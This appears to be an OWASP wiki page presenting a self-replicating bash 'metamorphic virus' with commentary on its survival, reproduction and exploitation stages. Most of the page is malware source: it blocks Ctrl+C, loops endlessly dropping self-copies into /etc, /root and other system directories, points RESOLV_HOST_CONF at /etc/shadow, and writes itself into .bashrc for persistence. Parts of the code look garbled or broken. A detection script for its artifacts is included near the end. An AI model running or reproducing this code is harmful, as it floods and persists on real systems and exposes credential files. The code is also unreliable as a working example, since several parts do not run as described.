
Metamorphic Virology

From OWASP
Revision as of 22:58, 6 March 2013 by Gregory Disney (talk | contribs)

Rudimentary Metamorphic Virology
By Gregory Disney-Leugers

Download at: https://docs.google.com/a/owasp.org/file/d/0B3OSDccoP1KhbVkzWE1TZ3hSS0k/edit?usp=sharing

Virology should be viewed as evolutionary biology applied to code; to demonstrate this I wrote a bash script. This code is metamorphic in the sense of being self-modifying and self-propagating. The script covers the three main attributes of metamorphic virology: methods of survival, reproduction, and exploitation.

Survival:

 #!/bin/bash 
 trap  INT 
 for (( ; ; ))
 do

The first line "trap INT" creates a lock on the process, meaning that once it is activated, ctrl+c can't stop the process. Generally speaking, with a loop such as the second and third lines, a pid would be created to ensure that it could be stopped. In this script no pid is created, to ensure survival.


Reproduction:

 #!/bin/bash
 export RESOLV_HOST_CONF=/etc/shadow
 trap  INT
 for (( ; ; ))
 do
 FILE="/tmp/$(basename $0).$RANDOM."
 echo $FILE
 > $FILE
 FILES="/var/$(basename $0).$RANDOM."
 echo $FILES
 > $FILES
 FILEZ="/etc/$(basename $0).$RANDOM."
 echo $FILEZ
 > $FILEZ
 FILE="/tmp/$(basename $0).$RANDOM."
 echo $FILE
 > $FILE
 FILES="/var/$(basename $0).$RANDOM."
 echo $FILES
 > $FILES
 FILEZ="/etc/$(basename $0).$RANDOM."
 echo $FILEZ
 > $FILEZ
 FILER="/run/$(basename $0).$RANDOM."
 echo $FILER
 > $FILER
 FILEQ="/root/$(basename $0).$RANDOM."
 echo $FILEQ
 > $FILEQ

The script now has a loop producing blank files, roughly 7 per kernel second. The way each file name is written, it uses the basename of the script followed by a random suffix.

 cd /root && chmod u+x /root/$(basename $0).$RANDOM. &&
 cat >~/$(basename $0).$RANDOM. <<FSS
 #!/bin/bash
 trap  INT
 for (( ; ; ))
 do
 FILE="/tmp/$(basename $0).$RANDOM."
 echo $FILE
 > $FILE
 FILES="/var/$(basename $0).$RANDOM."
 echo $FILES
 > $FILES
 FILEZ="/etc/$(basename $0).$RANDOM."
 echo $FILEZ
 > $FILEZ
 FILE="/tmp/$(basename $0).$RANDOM."
 echo $FILE
 > $FILE
 FILES="/var/$(basename $0).$RANDOM."
 echo $FILES
 > $FILES
 FILEZ="/etc/$(basename $0).$RANDOM."
 echo $FILEZ
 > $FILEZ
 FILER="/run/$(basename $0).$RANDOM."
 echo $FILER
 > $FILER
 FILEQ="/root/$(basename $0).$RANDOM."
 echo $FILEQ
 > $FILEQ

Using cat, the original reproduction loop script is now written into each of the generated files.

 ssh lt 2>/tmp/$(basename $0).$RANDOM.
 cat /tmp/$(basename $0).$RANDOM.|awk -F"\`" {'print   $RANDOM'}|awk -F"\'" {'print $RANDOM'}
 while /bin/true ; do
   for i in $(basename $0)/* ; do
     if [ -w $i -a -c $i -a $i != $RANDOM ]; then
       cat $RANDOM > $i
     fi
   done
 done
 exec ~/$(basename $0).$RANDOM.
 FSS

Using cat, the tmp files are now written with a bidien payload. Everything from FSS to FSS is one output file.

 #!/bin/bash
 trap  INT
 for (( ; ; ))
 do
 FILE="/tmp/linware.1554."
 echo /tmp/linware.13359.
 > /tmp/linware.13359.
 FILES="/var/linware.8552."
 echo /var/linware.13938.
 > /var/linware.13938.
 FILEZ="/etc/linware.15018."
 echo /etc/linware.1714.
 > /etc/linware.1714.
 FILE="/tmp/linware.12031."
 echo /tmp/linware.13359.
 > /tmp/linware.13359.
 FILES="/var/linware.28141."
 echo /var/linware.13938.
 > /var/linware.13938.
 FILEZ="/etc/linware.29119."
 echo /etc/linware.1714.
 > /etc/linware.1714.
 FILER="/run/linware.21852."
 echo /run/linware.18072.
 > /run/linware.18072.
 FILEQ="/root/linware.14767."
 echo /root/linware.22566.
 > /root/linware.22566.
 ....
 exec ~/linware.22566.

Here's a sample of the output produced by the output script; at the end of the script it executes another output script. This can be used to map the propagation of the malware.

Exploitation:

 cat >~/.bashrc <<ASS
 /opt/linware
 /bin/linware
 /etc/linware
 /run/linware
 ASS
 cp /opt/linware /bin
 cp /opt/linware /etc
 exec /opt/linware
 exec ~/$(basename $0).$RANDOM

Using cat once again, the script writes to .bashrc, infecting bash to ensure survival. At the end of the loop the script initiates itself all over again.
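As an added defensive example (not the author's script), the following bash checks hunt for the artifacts the reproduction and exploitation stages described above leave behind: the `<basename>.<RANDOM>.` drop files and the bare-path launcher lines appended to .bashrc. The sandbox directory, file names and .bashrc lines it constructs are made up for the demonstration, and it assumes GNU find.

```bash
#!/bin/bash
# Added defensive example (not the page's code): hunt for what the script above
# leaves behind: (1) dropped files named "<basename>.<RANDOM>." with a trailing
# dot ($RANDOM is 0-32767, so 1-5 digits) in the directories the reproduction
# loop writes to, and (2) .bashrc lines that are nothing but an absolute path,
# the way the exploitation stage installs its launchers. Assumes GNU find.
DEFAULT_DROP_DIRS="/tmp /var /etc /run /root"   # dirs the reproduction loop uses
# Print regular files directly inside the given dirs named NAME.<digits>.
find_dropped_files() {
    local dir
    for dir in "$@"; do
        [ -d "$dir" ] || continue
        find "$dir" -maxdepth 1 -type f -regextype posix-extended \
            -regex '.*/[^/]+\.[0-9]{1,5}\.' 2>/dev/null
    done
}

# Same scan reduced to a count, for alerting.
count_dropped_files() { find_dropped_files "$@" | wc -l | tr -d ' '; }

# Count .bashrc lines that are a bare absolute path under a drop/launch dir
# (e.g. "/opt/linware"); prints 0 when the file is missing.
count_bashrc_launchers() {
    [ -f "$1" ] || { echo 0; return; }
    grep -cE '^[[:space:]]*/(opt|bin|etc|run|tmp|var|root)/[^[:space:]]+[[:space:]]*$' "$1" || true
}

# Constructed sandbox (fake drop dirs plus fake .bashrc) so the checks run
# offline without touching the host; prints its path.
make_sandbox() {
    local sb
    sb=$(mktemp -d)
    mkdir -p "$sb/tmp" "$sb/etc" "$sb/home"
    : > "$sb/tmp/linware.13359."        # constructed: matches the drop pattern
    : > "$sb/etc/linware.1714."         # constructed: matches the drop pattern
    echo "data" > "$sb/tmp/notes.txt"   # benign, must not match
    printf '%s\n' 'alias ll="ls -l"' '/opt/linware' '/etc/linware' > "$sb/home/.bashrc"
    echo "$sb"
}

# With --host scan the real machine; otherwise demonstrate on the sandbox.
if [ "${1:-}" = "--host" ]; then
    find_dropped_files $DEFAULT_DROP_DIRS
    echo "bashrc launcher lines: $(count_bashrc_launchers "$HOME/.bashrc")"
else
    sb=$(make_sandbox)
    find_dropped_files "$sb/tmp" "$sb/etc"
    echo "bashrc launcher lines: $(count_bashrc_launchers "$sb/home/.bashrc")"
    rm -rf "$sb"
fi
```

The trailing-dot naming is distinctive enough that a hit in /etc or /run deserves a look even when the file is empty, since the loop creates blanks before it fills some of them.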


WARNING: this script should only be used in a controlled environment such as a VM.

WARNING: this script should be considered malicious.